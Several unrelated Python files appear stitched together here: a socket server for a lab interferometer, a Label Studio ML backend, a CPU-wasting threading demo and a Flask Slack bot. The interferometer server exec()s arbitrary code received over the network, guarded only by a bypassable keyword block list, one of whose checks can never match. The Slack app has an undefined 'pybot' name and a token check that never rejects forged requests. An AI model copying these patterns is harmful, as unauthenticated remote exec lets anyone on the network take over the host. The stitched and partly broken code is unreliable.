conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
conn.close()
break
elif cmd.decode():
cmdmsg = cmd.decode()
# Attempt to Prevent malicious code from executing
if cmdmsg[0:3] == 'os.' or cmdmsg[0:3] == 'sys.':
msg = 'COMMAND ERROR: RESTRICTED ACCESS TO OS and SYS MODULES'.encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
msg = '1'.encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
conn.close()
elif 'exec(' in cmdmsg or 'eval(' in cmdmsg:
msg = "COMMAND ERROR: RESTRICTED ACCESS TO EXEC and EVAL FUNCTIONS".encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
msg = '1'.encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
conn.close()
elif '.join(' in cmdmsg:
msg = "COMMAND ERROR: RESTRICTED ACCESS TO JOIN FUNCTION".encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
msg = '1'.encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
conn.close()
else:
""" Attempt to execute function on remote computer"""
try:
dataresult = None
exec(cmdmsg)
if dataresult:
# If the statment returns a value, code assumes it's data. Will return the datafile location
msg = "DATA".encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
msg = "{}".format(dataresult).encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
else:
msg = "NO RETURN DATA".encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
# Send success/fail code (0/1)
msg = '0'.encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
except TypeError:
msg = "COMMAND FAILED".encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
msg = '1'.encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
conn.close()
finally:
conn.close()
else:
conn.close()
self.soc.close()
print('Server Closed')
# logging.info('Server Closed')
return
if __name__ == "__main__":
srv = InterferometerServer()
srv.listening()
#
# def setup_server(ip_addr='127.0.0.1', port=50001):
# """Establishes a socket server at the provided address and port"""
# soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# soc.bind((ip_addr, port))
# print('Server Socket established at {} Port: {}'.format(ip_addr, port))
# soc.listen(1)
# soc.settimeout(120)
# return soc
#
# if __name__ == '__main__':
# soc = setup_server()
#
# while True:
#
# conn, addr = soc.accept()
# print(f'Incoming Connection from {addr}')
# conn.send('Connected to 4D Interferometer'.encode('utf-8'))
# try:
# data = conn.recv(1024)
# if data == b'hbt':
# conn.send(''.encode('utf-8'))
# elif data:
# try:
# exec(data)
# #conn.send(f'Executing {data}'.encode('utf-8'))
# print(f'Executing {data}')
# conn.send(f'1\n'.encode('utf-8'))
# except NameError:
# print(f'Cannont execute {data}. Closing Connection')
# #conn.send('Operation Failed'.encode('utf-8'))
# conn.send('0\n'.encode('utf-8'))
# else:
# break
# finally:
# time.sleep(.2)
# conn.send('Connection Closed'.encode('utf-8'))
# conn.close()
|
model.py
|
import os
import logging
import sys
import time
import json
import redis
import attr
import io
try:
import torch.multiprocessing as mp
try:
mp.set_start_method('spawn')
except RuntimeError:
pass
except ImportError:
import multiprocessing as mp
import importlib
import importlib.util
import inspect
from typing import Dict
from abc import ABC, abstractmethod
from datetime import datetime
from itertools import tee
from contextlib import contextmanager
from redis import Redis
from rq import Queue, get_current_job
from rq.registry import StartedJobRegistry, FinishedJobRegistry, FailedJobRegistry
from rq.job import Job
from colorama import Fore
from label_studio_tools.core.utils.params import get_bool_env
from label_studio_tools.core.label_config import parse_config
from label_studio_tools.core.utils.io import get_local_path
logger = logging.getLogger(__name__)
@attr.s
class ModelWrapper(object):
model = attr.ib()
model_version = attr.ib()
is_training = attr.attrib(default=False)
class JobManager(object):
"""Job Manager provides a facility to spin up background jobs for LabelStudioMLBase models"""
def get_result(self, model_version=None):
"""Return job result based on specified model_version (=job_id)"""
job_result = None
if model_version:
logger.debug(f'Get result based on model_version={model_version}')
try:
job_result = self.get_result_from_job_id(model_version)
except Exception as exc:
logger.error(exc, exc_info=True)
else:
logger.debug(f'Get result from last valid job')
job_result = self.get_result_from_last_job()
return job_result or {}
def job(self, model_class, event: str, data: Dict, job_id: str):
"""
Job function to be run in background. It actually does the following:
1. Creates model_class instance, possibly by using artefacts from previously finished jobs
2. Calls model_class.process_event() method
:param model_class: LabelStudioMLBase instance
:param event: event name (e.g. Label Studio webhook action name)
:param data: job data (e.g. Label Studio webhook payload)
:param job_id: user-defined job identifier
:return: json-serializable job result
"""
with self.start_run(event, data, job_id):
model_version = data.get('model_version') or data.get('project', {}).get('model_version')
job_result = self.get_result(model_version)
label_config = data.get('label_config') or data.get('project', {}).get('label_config')
train_output = job_result.get('train_output')
logger.debug(f'Load model with label_config={label_config} and train_output={train_output}')
model = model_class(label_config=label_config, train_output=train_output)
additional_params = self.get_additional_params(event, data, job_id)
result = model.process_event(event, data, job_id, additional_params)
self.post_process(event, data, job_id, result)
logger.debug(f'Finished processing event {event}! Return result: {result}')
return result
def get_additional_params(self, event, data, job_id):
"""Dict with aux parameters required to run process_event()"""
return {}
@contextmanager
def start_run(self, event, data, job_id):
"""Context manager that can be used to create a separate 'run':
Useful to perform ML tracking, i.e. by creating a separate workspace for each job call.
For example, it could be implemented with MLFlow:
```python
with mlflow.start_run() as run:
yield run
```
"""
raise NotImplementedError
def get_result_from_job_id(self, job_id):
"""This is the actual function should be used further to ensure 'job_id' is included in results.
DON'T OVERRIDE THIS FUNCTION! Instead, override _get_result_from_job_id
"""
result = self._get_result_from_job_id(job_id)
assert isinstance(result, dict)
result['job_id'] = job_id
return result
def _get_result_from_job_id(self, job_id):
"""Return job result by job id"""
raise NotImplementedError
def iter_finished_jobs(self):
raise NotImplementedError
def get_result_from_last_job(self, skip_empty_results=True):
"""Return job result by last successfully finished job
when skip_empty_results is True, result is None are skipped (e.g. if fit() function makes `return` call)
"""
for job_id in self.iter_finished_jobs():
logger.debug(f'Try job_id={job_id}')
try:
result = self.get_result_from_job_id(job_id)
except Exception as exc:
logger.error(f'{job_id} job returns exception: {exc}', exc_info=True)
continue
if skip_empty_results and result is None:
logger.debug(f'Skip empty result from job {job_id}')
continue
return result
# if nothing found - return empty result
return
def post_process(self, event, data, job_id, result):
"""Post-processing hook after calling process_event()"""
raise NotImplementedError
def run_job(self, model_class, args: tuple):
"""Defines the logic to run job() in background"""
raise NotImplementedError
class SimpleJobManager(JobManager):
"""Simple Job Manager doesn't require additional dependencies
and uses a native python multiprocessing for running job in background.
Job results / artefacts are stored as ordinary files, inside user-defined model directory:
model_dir:
|_ job_id
|_ event.json
|_ job_result.json
|_ artefacts.bin
Note, that this job manager should be used only for development purposes.
"""
JOB_RESULT = 'job_result.json' # in this file,
def __init__(self, model_dir='.'):
self.model_dir = model_dir
@contextmanager
def start_run(self, event, data, job_id):
job_dir = self._job_dir(job_id)
os.makedirs(job_dir, exist_ok=True)
with open(os.path.join(job_dir, 'event.json'), mode='w') as f:
event_data = {'event': event, 'job_id': job_id}
if data:
event_data['data'] = data
json.dump(event_data, f, indent=2)
yield job_dir
def _job_dir(self, job_id):
return os.path.join(self.model_dir, str(job_id))
def get_additional_params(self, event, data, job_id):
return {'workdir': self._job_dir(job_id)}
def _get_result_from_job_id(self, job_id):
"""
Return job result or {}
@param job_id: Job id (also known as model version)
@return: dict
"""
job_dir = self._job_dir(job_id)
if not os.path.exists(job_dir):
logger.warning(f"=> Warning: {job_id} dir doesn't exist. "
f"It seems that you don't have specified model dir.")
return None
result_file = os.path.join(job_dir, self.JOB_RESULT)
if not os.path.exists(result_file):
logger.warning(f"=> Warning: {job_id} dir doesn't contain result file. "
f"It seems that previous training session ended with error.")
return None
logger.debug(f'Read result from {result_file}')
with open(result_file) as f:
result = json.load(f)
return result
def iter_finished_jobs(self):
logger.debug(f'Try fetching last valid job id from directory {self.model_dir}')
return reversed(sorted(map(int, filter(lambda d: d.isdigit(), os.listdir(self.model_dir)))))
def post_process(self, event, data, job_id, result):
if isinstance(result, dict):
result_file = os.path.join(self._job_dir(job_id), self.JOB_RESULT)
logger.debug(f'Saving job {job_id} result to file: {result_file}')
with open(result_file, mode='w') as f:
json.dump(result, f)
else:
logger.info(f'Cannot save result {result}')
def run_job(self, model_class, args: tuple):
proc = mp.Process(target=self.job, args=tuple([model_class] + list(args)))
proc.daemon = True
proc.start()
logger.info(f'Subprocess {proc.pid} has been started with args={args}')
class RQJobManager(JobManager):
"""
RQ-based Job Manager runs all background jobs in RQ workers and requires Redis server to be installed.
All jobs results are be stored and could be retrieved from Redis queue.
"""
MAX_QUEUE_LEN = 1 # Controls a maximal amount of simultaneous jobs running in queue.
# If exceeded, new jobs are ignored
def __init__(self, redis_host, redis_port, redis_queue):
self.redis_host = redis_host
self.redis_port = redis_port
self.redis_queue = redis_queue
def _get_redis(self, host, port, raise_on_error=False):
r = Redis(host=host, port=port)
try:
r.ping()
except redis.ConnectionError:
if raise_on_error:
raise
return None
else:
return r
@contextmanager
def start_run(self, event, data, job_id):
# Each "job" record in queue already encapsulates each run
yield
def run_job(self, model_class, args: tuple):
# Launch background job with RQ (production mode)
event, data, job_id = args
redis = self._get_redis(self.redis_host, self.redis_port)
queue = Queue(name=self.redis_queue, connection=redis)
if len(queue) >= self.MAX_QUEUE_LEN:
logger.warning(f'Maximal RQ queue len {self.MAX_QUEUE_LEN} reached. Job is not started.')
return
job = queue.enqueue(
self.job,
args=(model_class, event, data, job_id),
job_id=job_id,
job_timeout='365d',
ttl=None,
result_ttl=-1,
failure_ttl=300)
assert job.id == job_id
logger.info(f'RQ job {job_id} has been started for event={event}')
def _get_result_from_job_id(self, job_id):
redis = self._get_redis(self.redis_host, self.redis_port)
job = Job.fetch(job_id, connection=redis)
return job.result
def iter_finished_jobs(self):
redis = self._get_redis(self.redis_host, self.redis_port)
finished_jobs = FinishedJobRegistry(self.redis_queue, redis)
jobs = []
for job_id in finished_jobs.get_job_ids():
job = Job.fetch(job_id, connection=redis)
jobs.append((job_id, job.ended_at))
return (j[0] for j in reversed(sorted(jobs, key=lambda job: job[1])))
def post_process(self, event, data, job_id, result):
pass
class LabelStudioMLBase(ABC):
TRAIN_EVENTS = (
'ANNOTATION_CREATED',
'ANNOTATION_UPDATED',
'ANNOTATION_DELETED',
'PROJECT_UPDATED'
)
def __init__(self, label_config=None, train_output=None, **kwargs):
"""Model loader"""
self.label_config = label_config
self.parsed_label_config = parse_config(self.label_config) if self.label_config else {}
self.train_output = train_output or {}
self.hostname = kwargs.get('hostname', '')
self.access_token = kwargs.get('access_token', '')
@abstractmethod
def predict(self, tasks, **kwargs):
pass
def process_event(self, event, data, job_id, additional_params):
if event in self.TRAIN_EVENTS:
logger.debug(f'Job {job_id}: Received event={event}: calling {self.__class__.__name__}.fit()')
train_output = self.fit((), event=event, data=data, job_id=job_id, **additional_params)
logger.debug(f'Job {job_id}: Train finished.')
return train_output
def fit(self, tasks, workdir=None, **kwargs):
return {}
def get_local_path(self, url, project_dir=None):
return get_local_path(url, project_dir=project_dir, hostname=self.hostname, access_token=self.access_token)
class LabelStudioMLManager(object):
model_class = None
model_dir = None
redis_host = None
redis_port = None
redis_queue = None
train_kwargs = None
_redis = None
_redis_queue = None
_current_model = {}
@classmethod
def initialize(
cls, model_class, model_dir=None, redis_host='localhost', redis_port=6379, redis_queue='default',
**init_kwargs
):
if not issubclass(model_class, LabelStudioMLBase):
raise ValueError('Inference class should be the subclass of ' + LabelStudioMLBase.__class__.__name__)
cls.model_class = model_class
cls.redis_queue = redis_queue
cls.model_dir = model_dir
cls.init_kwargs = init_kwargs
cls.redis_host = redis_host
cls.redis_port = redis_port
if cls.model_dir:
cls.model_dir = os.path.expanduser(cls.model_dir)
os.makedirs(cls.model_dir, exist_ok=True)
cls._redis = None
if get_bool_env('USE_REDIS', False):
cls._redis = cls._get_redis(redis_host, redis_port)
if cls._redis:
cls._redis_queue = Queue(name=redis_queue, connection=cls._redis)
@classmethod
def get_initialization_params(cls):
return dict(
model_class=cls.model_class,
model_dir=cls.model_dir,
redis_host=cls.redis_host,
redis_port=cls.redis_port,
redis_queue=cls.redis_queue,
**cls.init_kwargs
)
@classmethod
def without_redis(cls):
return cls._redis is None
@classmethod
def _get_redis(cls, host, port, raise_on_error=False):
r = Redis(host=host, port=port)
try:
r.ping()
except redis.ConnectionError:
if raise_on_error:
raise
return None
else:
return r
@classmethod
def _generate_version(cls):
return str(int(datetime.now().timestamp()))
@classmethod
def _get_tasks_key(cls, project):
return 'project:' + str(project) + ':tasks'
@classmethod
def _get_job_results_key(cls, project):
return 'project:' + str(project) + ':job_results'
@classmethod
def _remove_jobs(cls, project):
started_registry = StartedJobRegistry(cls._redis_queue.name, cls._redis_queue.connection)
finished_registry = FinishedJobRegistry(cls._redis_queue.name, cls._redis_queue.connection)
for job_id in started_registry.get_job_ids() + finished_registry.get_job_ids():
job = Job.fetch(job_id, connection=cls._redis)
if job.meta.get('project') != project:
continue
logger.info('Deleting job_id ' + job_id)
job.delete()
@classmethod
def _get_latest_job_result_from_redis(cls, project):
job_results_key = cls._get_job_results_key(project)
try:
num_finished_jobs = cls._redis.llen(job_results_key)
if num_finished_jobs == 0:
logger.info('Job queue is empty')
return
latest_job = cls._redis.lindex(job_results_key, -1)
except redis.exceptions.ConnectionError as exc:
logger.error(exc)
return
else:
return json.loads(latest_job)
@classmethod
def _get_latest_job_result_from_workdir(cls, project):
project_model_dir = os.path.join(cls.model_dir, project or '')
if not os.path.exists(project_model_dir):
return
# sort directories by decreasing timestamps
for subdir in reversed(sorted(map(int, filter(lambda d: d.isdigit(), os.listdir(project_model_dir))))):
job_result_file = os.path.join(project_model_dir, str(subdir), 'job_result.json')
if not os.path.exists(job_result_file):
logger.error('The latest job result file ' + job_result_file + ' doesn\'t exist')
continue
with open(job_result_file) as f:
return json.load(f)
@classmethod
def _key(cls, project):
return project, os.getpid()
@classmethod
def has_active_model(cls, project):
return cls._key(project) in cls._current_model
@classmethod
def get(cls, project):
key = cls._key(project)
logger.debug('Get project ' + str(key))
return cls._current_model.get(key)
@classmethod
def create(cls, project=None, label_config=None, train_output=None, version=None, **kwargs):
key = cls._key(project)
logger.debug('Create project ' + str(key))
kwargs.update(cls.init_kwargs)
cls._current_model[key] = ModelWrapper(
model=cls.model_class(label_config=label_config, train_output=train_output, **kwargs),
model_version=version or cls._generate_version()
)
return cls._current_model[key]
@classmethod
def get_or_create(
cls, project=None, label_config=None, force_reload=False, train_output=None, version=None, **kwargs
):
# reload new model if model is not loaded into memory OR force_reload=True OR model versions are mismatched
if not cls.has_active_model(project) or force_reload or (cls.get(project).model_version != version and version is not None): # noqa
logger.debug('Reload model for project={project} with version={version}'.format(
project=project, version=version))
cls.create(project, label_config, train_output, version, **kwargs)
return cls.get(project)
@classmethod
def fetch(cls, project=None, label_config=None, force_reload=False, **kwargs):
if not os.getenv('LABEL_STUDIO_ML_BACKEND_V2', default=True):
# TODO: Deprecated branch
if cls.without_redis():
logger.debug('Fetch ' + project + ' from local directory')
job_result = cls._get_latest_job_result_from_workdir(project) or {}
else:
logger.debug('Fetch ' + project + ' from Redis')
job_result = cls._get_latest_job_result_from_redis(project) or {}
train_output = job_result.get('train_output')
version = job_result.get('version')
return cls.get_or_create(project, label_config, force_reload, train_output, version, **kwargs)
model_version = kwargs.get('model_version')
if not cls._current_model or model_version != cls._current_model.model_version:
jm = cls.get_job_manager()
model_version = kwargs.get('model_version')
job_result = jm.get_result(model_version)
if job_result:
logger.debug(f'Found job result: {job_result}')
model = cls.model_class(label_config=label_config, train_output=job_result, **kwargs)
cls._current_model = ModelWrapper(model=model, model_version=job_result['job_id'])
else:
logger.debug(f'Job result not found: create initial model')
model = cls.model_class(label_config=label_config, **kwargs)
cls._current_model = ModelWrapper(model=model, model_version='INITIAL')
return cls._current_model
@classmethod
def job_status(cls, job_id):
job = Job.fetch(job_id, connection=cls._redis)
response = {
'job_status': job.get_status(),
'error': job.exc_info,
'created_at': job.created_at,
'enqueued_at': job.enqueued_at,
'started_at': job.started_at,
'ended_at': job.ended_at
}
if job.is_finished and isinstance(job.result, str):
response['result'] = json.loads(job.result)
return response
@classmethod
def is_training(cls, project):
if not cls.has_active_model(project):
return {'is_training': False}
m = cls.get(project)
if cls.without_redis():
return {
'is_training': m.is_training,
'backend': 'none',
'model_version': m.model_version
}
else:
started_jobs = StartedJobRegistry(cls._redis_queue.name, cls._redis_queue.connection).get_job_ids()
finished_jobs = FinishedJobRegistry(cls._redis_queue.name, cls._redis_queue.connection).get_job_ids()
failed_jobs = FailedJobRegistry(cls._redis_queue.name, cls._redis_queue.connection).get_job_ids()
running_jobs = list(set(started_jobs) - set(finished_jobs + failed_jobs))
logger.debug('Running jobs: ' + str(running_jobs))
for job_id in running_jobs:
job = Job.fetch(job_id, connection=cls._redis)
if job.meta.get('project') == project:
return {
'is_training': True,
'job_id': job_id,
'backend': 'redis',
'model_version': m.model_version,
}
return {
'is_training': False,
'backend': 'redis',
'model_version': m.model_version
}
@classmethod
def predict(
cls, tasks, project=None, label_config=None, force_reload=False, try_fetch=True, **kwargs
):
if not os.getenv('LABEL_STUDIO_ML_BACKEND_V2', default=True):
if try_fetch:
m = cls.fetch(project, label_config, force_reload)
else:
m = cls.get(project)
if not m:
raise FileNotFoundError('No model loaded. Specify "try_fetch=True" option.')
predictions = m.model.predict(tasks, **kwargs)
return predictions, m
if not cls._current_model:
raise ValueError(f'Model is not loaded for {cls.__class__.__name__}: run setup() before using predict()')
predictions = cls._current_model.model.predict(tasks, **kwargs)
return predictions, cls._current_model
@classmethod
def create_data_snapshot(cls, data_iter, workdir):
data = list(data_iter)
data_file = os.path.join(workdir, 'train_data.json')
with io.open(data_file, mode='w') as fout:
json.dump(data, fout, ensure_ascii=False)
info_file = os.path.join(workdir, 'train_data_info.json')
with io.open(info_file, mode='w') as fout:
json.dump({'count': len(data)}, fout)
@classmethod
def train_script_wrapper(
cls, project, label_config, train_kwargs, initialization_params=None, tasks=()
):
if initialization_params:
# Reinitialize new cls instance for using in RQ context
initialization_params = initialization_params or {}
cls.initialize(**initialization_params)
# fetching the latest model version before we generate the next one
t = time.time()
m = cls.fetch(project, label_config)
m.is_training = True
version = cls._generate_version()
if cls.model_dir:
logger.debug('Running in model dir: ' + cls.model_dir)
project_model_dir = os.path.join(cls.model_dir, project or '')
workdir = os.path.join(project_model_dir, version)
os.makedirs(workdir, exist_ok=True)
else:
logger.debug('Running without model dir')
workdir = None
if cls.without_redis():
data_stream = tasks
else:
data_stream = (json.loads(t) for t in cls._redis.lrange(cls._get_tasks_key(project), 0, -1))
if workdir:
data_stream, snapshot = tee(data_stream)
cls.create_data_snapshot(snapshot, workdir)
try:
train_output = m.model.fit(data_stream, workdir, **train_kwargs)
if cls.without_redis():
job_id = None
else:
job_id = get_current_job().id
job_result = json.dumps({
'status': 'ok',
'train_output': train_output,
'project': project,
'workdir': workdir,
'version': version,
'job_id': job_id,
'time': time.time() - t
})
if workdir:
job_result_file = os.path.join(workdir, 'job_result.json')
with open(job_result_file, mode='w') as fout:
fout.write(job_result)
if not cls.without_redis():
cls._redis.rpush(cls._get_job_results_key(project), job_result)
except:
raise
finally:
m.is_training = False
return job_result
@classmethod
def _start_training_job(cls, project, label_config, train_kwargs):
job = cls._redis_queue.enqueue(
cls.train_script_wrapper,
args=(project, label_config, train_kwargs, cls.get_initialization_params()),
job_timeout='365d',
ttl=None,
result_ttl=-1,
failure_ttl=300,
meta={'project': project},
)
logger.info('Training job {job} started for project {project}'.format(job=job, project=project))
return job
@classmethod
def train(cls, tasks, project=None, label_config=None, **kwargs):
job = None
if cls.without_redis():
job_result = cls.train_script_wrapper(
project, label_config, train_kwargs=kwargs, tasks=tasks)
train_output = json.loads(job_result)['train_output']
cls.get_or_create(project, label_config, force_reload=True, train_output=train_output)
else:
tasks_key = cls._get_tasks_key(project)
cls._redis.delete(tasks_key)
for task in tasks:
cls._redis.rpush(tasks_key, json.dumps(task))
job = cls._start_training_job(project, label_config, kwargs)
return job
@classmethod
def get_job_manager(cls):
if cls.without_redis():
# Launch background job with fork (dev mode)
job_man = SimpleJobManager(model_dir=cls.model_dir)
else:
# Launch background job with RQ (production mode)
job_man = RQJobManager(redis_host=cls.redis_host, redis_port=cls.redis_port, redis_queue=cls.redis_queue)
return job_man
@classmethod
def webhook(cls, event, data):
job_id = cls._generate_version()
cls.get_job_manager().run_job(cls.model_class, (event, data, job_id))
return {'job_id': job_id}
def get_all_classes_inherited_LabelStudioMLBase(script_file):
names = set()
abs_path = os.path.abspath(script_file)
module_name = os.path.splitext(os.path.basename(script_file))[0]
sys.path.append(os.path.dirname(abs_path))
try:
module = importlib.import_module(module_name)
except ModuleNotFoundError as e:
print(Fore.RED + 'Can\'t import module "' + module_name + f'", reason: {e}.\n'
'If you are looking for examples, you can find a dummy model.py here:\n' +
Fore.LIGHTYELLOW_EX + 'https://labelstud.io/tutorials/dummy_model.html')
module = None
exit(-1)
for name, obj in inspect.getmembers(module, inspect.isclass):
if name == LabelStudioMLBase.__name__:
continue
if issubclass(obj, LabelStudioMLBase):
names.add(name)
for base in obj.__bases__:
if LabelStudioMLBase.__name__ == base.__name__:
names.add(name)
sys.path.pop()
return list(names)
|
parallel_programming_1.py
|
#!/usr/bin/env python3
""" Code for https://www.linkedin.com/learning/python-parallel-and-concurrent-programming-part-1/multiple-threads-python-demo?u=26192810 """
import os
import threading
""" C20: 演示一个简单的 thread 例子, 显示 pid, threading.active_count() 和返回 Thread 对象列表
"""
class C2_0:
# a simple function that wastes CPU cycles forever
@staticmethod
def cpu_waster():
while True:
pass
@staticmethod
def start_n_waster_thread(n=12):
print(f'\nStarting {n} CPU Wasters...')
for i in range(n):
threading.Thread(target=C2_0.cpu_waster).start()
@staticmethod
def display_mp_thread_info():
print('\n Process ID: ', os.getpid()) # 🔥🔥 os.getpid() 信息, process 的信息.
print('Thread Count: ', threading.active_count())
for thread in threading.enumerate(): # 🔥 返回当前活动 Thread 对象列表
print(thread)
@staticmethod
def call_thread():
C2_0.display_mp_thread_info() # 1. display information about this process
C2_0.start_n_waster_thread(12) # 2. start 12 CPU threads
C2_0.display_mp_thread_info() # 3. display information about this process
""" C2_1: 演示简单的 multiprocessing 例子
"""
import multiprocessing as mp
class C2_1:
@staticmethod
def start_n_waster_mp(n=12):
print(f'\nStarting {n} CPU Wasters...')
for i in range(n):
mp.Process(target=C2_0.cpu_waster).start() # 🔥🔥 start a process. 和 thread 类似.
@staticmethod
def call_mp():
C2_0.display_mp_thread_info()
C2_1.start_n_waster_mp(12)
C2_0.display_mp_thread_info()
if __name__ == '__main__':
# C2_0.call_thread()
C2_1.call_mp()
|
app.py
|
# -*- coding: utf-8 -*-
"""
A routing layer for the MUN bot built using
[Slack's Events API](https://api.slack.com/events-api) in Python
"""
import json
import bot
from flask import Flask, request, make_response, render_template
from threading import Thread
pyBot = bot.Bot()
slack = pyBot.client
app = Flask(__name__)
def _event_handler(event_type, slack_event):
"""
A helper function that routes events from Slack to our Bot
by event type and subtype.
Parameters
----------
event_type : str
type of event recieved from Slack
slack_event : dict
JSON response from a Slack reaction event
Returns
----------
obj
Response object with 200 - ok or 500 - No Event Handler error
"""
team_id = slack_event["team_id"]
# ================ Team Join Events =============== #
# When the user first joins a team, the type of event will be team_join
if event_type == "team_join":
user_id = slack_event["event"]["user"]["id"]
# Send the onboarding message
pyBot.onboarding_message(team_id, user_id)
return make_response("Welcome Message Sent", 200,)
# ============== Share Message Events ============= #
# If the user has shared the onboarding message, the event type will be
# message. We'll also need to check that this is a message that has been
# shared by looking into the attachments for "is_shared".
elif event_type == "message" and slack_event["event"].get("attachments"):
user_id = slack_event["event"].get("user")
if slack_event["event"]["attachments"][0].get("is_share"):
# Update the onboarding message and check off "Share this Message"
pyBot.update_share(team_id, user_id)
return make_response("Welcome message updates with shared message",
200,)
# ============= Reaction Added Events ============= #
# If the user has added an emoji reaction to the onboarding message
elif event_type == "reaction_added":
user_id = slack_event["event"]["user"]
# Update the onboarding message
pyBot.update_emoji(team_id, user_id)
return make_response("Welcome message updates with reactji", 200,)
# =============== Pin Added Events ================ #
# If the user has added an emoji reaction to the onboarding message
elif event_type == "pin_added":
user_id = slack_event["event"]["user"]
# Update the onboarding message
pyBot.update_pin(team_id, user_id)
return make_response("Welcome message updates with pin", 200,)
# ================ potty mouth detector ============ #
# scans deleted messages for
elif event_type == "message.im":
if "message_deleted" in slack_event["event"]["subtype"]:
message = slack_event["event"]["text"]
message_set = set(message.split(' '))
if not message_set.isdisjoint(bad_words):
bad_message = {}
bad_message["user"] = slack_event["event"]["user"]
bad_message["message"] = message
bad_message["channel"] = slack_event["channel"]
bad_message["time"] = slack_event["ts"]
#alert committee staff
#alert Secretariat
#alert advisor(s)
return make_response("bad message", 200,)
return make_response("good message", 200,)
# ============= Event Type Not Found! ============= #
# If the event_type does not have a handler
message = "You have not added an event handler for the %s" % event_type
# Return a helpful error message
return make_response(message, 200, {"X-Slack-No-Retry": 1})
@app.route("/install", methods=["GET"])
def pre_install():
"""This route renders the installation page with 'Add to Slack' button."""
# Since we've set the client ID and scope on our Bot object, we can change
# them more easily while we're developing our app.
client_id = pyBot.oauth["client_id"]
scope = pyBot.oauth["scope"]
# Our template is using the Jinja templating language to dynamically pass
# our client id and scope
return render_template("install.html", client_id=client_id, scope=scope)
@app.route("/thanks", methods=["GET", "POST"])
def thanks():
"""
This route is called by Slack after the user installs our app. It will
exchange the temporary authorization code Slack sends for an OAuth token
which we'll save on the bot object to use later.
To let the user know what's happened it will also render a thank you page.
"""
# Let's grab that temporary authorization code Slack's sent us from
# the request's parameters.
code_arg = request.args.get('code')
# The bot's auth method to handles exchanging the code for an OAuth token
pyBot.auth(code_arg)
return render_template("thanks.html")
@app.route("/update", methods=["GET", "POST"])
def update():
"""
This route is called by Postman to initialize the Slack client with
our access token. Otherwise in development the token never gets updated
"""
token = request.args.get('token')
team_id = request.args.get('team_id')
pyBot.update_token(team_id, token)
return make_response("Token updated", 200, {"content_type":
"application/json"
})
@app.route("/init_conference", methods=["GET", "POST"])
def start_conference():
"""
This route is called by the slash command /init_conference for creating
an integrated conference object with multiple committees that may or may
not interact. This way there will be one slack team for the entire conference
"""
def make_conference(conference_info):
admin = {conference_info["user_id"]:conference_info["user_name"]}
conference = {conference_info["team_id"]:conference_info["text"]}
pyBot.create_conference(conference, admin, conference_info["response_url"] )
thread = Thread(target=make_conference, kwargs={'conference_info':request.form})
if len(request.form["text"]) > 3: # for minamum MUN
message = "conference " + request.form["text"] + " initializing"
thread.start()
else:
message = "please supply conference name[/init_conference [name]]"
return make_response(message, 200, {"content_type":"application/json"})
@app.route("/init_universe", methods=["GET", "POST"])
def start_universe():
"""
This route is called by the slash command /init_universe for creating
a 'universe' in the conference (a stand-alone committee has is one committee
in one universe, an X-number-JCC is X committees in one universe).
Must be called after a call to/init_conference
Slash commands send data as url-form-encoded which gets put into
request.form NOT request.data
"""
if not pyBot.conference:
#Conference has not been set
return make_response("conference not initialized", 200, {"content_type":
"plain text"})
universe_jcc = True
universe_info = request.form
print(universe_info)
payload = universe_info["text"]
if "jcc" in payload: universe_jcc = True
payload = payload.split(" ")
committee_list = set()
for word in payload:
if '<#' not in word and '#' in word:
word = word[1:21].lower()
ok ="_0123456789-abcdefghijklmnopqrstuvwxyz"
if all(c in ok for c in word):
committee_list.add(word)
if not universe_jcc:
committee_list.add({"name": universe_info["channel_name"],
"id": universe_info["channel_id"]})
pybot.create_universe(universe_info["channel_name"],
universe_info["channel_id"],
committee_list,
universe_jcc)
@app.route("/add_jcc", methods=["GET", "POST"])
def add_jcc():
""" have to include the #channel that is the
base of the jcc"""
if not pybot.conference:
#conference hasn't been initialized
return make_response("conference not initialized", 200, {"content_type":
"plain text"})
universe_id = None
committee_info = request.form
payload = committee_info["text"]
if "<#" in payload:
payload = payload.split("<#")
universe_id = payload[1].split(">")
else:
#channel not specified!
return make_response("channel not specified", 200, {"content_type":
"plain text"})
if universe_id:
pybot.add_universe_committee(universe_id,
committee_info["channel_name"],
committee_info["channel_id"])
else:
#could not parse universe_id
return make_response("could not find universe channel", 200, {"content_type":
"plain text"})
@app.route("/listening", methods=["GET", "POST"])
def hears():
"""
This route listens for incoming events from Slack and uses the event
handler helper function to route events to our Bot.
"""
slack_event = json.loads(request.data)
# ============= Slack URL Verification ============ #
# In order to verify the url of our endpoint, Slack will send a challenge
# token in a request and check for this token in the response our endpoint
# sends ba/ck.
# For more info: https://api.slack.com/events/url_verification
if "challenge" in slack_event:
return make_response(slack_event["challenge"], 200, {"content_type":
"application/json"
})
# ============ Slack Token Verification =========== #
# We can verify the request is coming from Slack by checking that the
# verification token in the request matches our app's settings
if pyBot.verification != slack_event.get("token"):
message = "Invalid Slack verification token: %s \npyBot has: \
%s\n\n" % (slack_event["token"], pyBot.verification)
# By adding "X-Slack-No-Retry" : 1 to our response headers, we turn off
# Slack's automatic retries during development.
make_response(message, 403, {"X-Slack-No-Retry": 1})
# ====== Process Incoming Events from Slack ======= #
# If the incoming request is an Event we've subcribed to
if "event" in slack_event:
event_type = slack_event["event"]["type"]
# Then handle the event by event_type and have your bot respond
return _event_handler(event_type, slack_event)
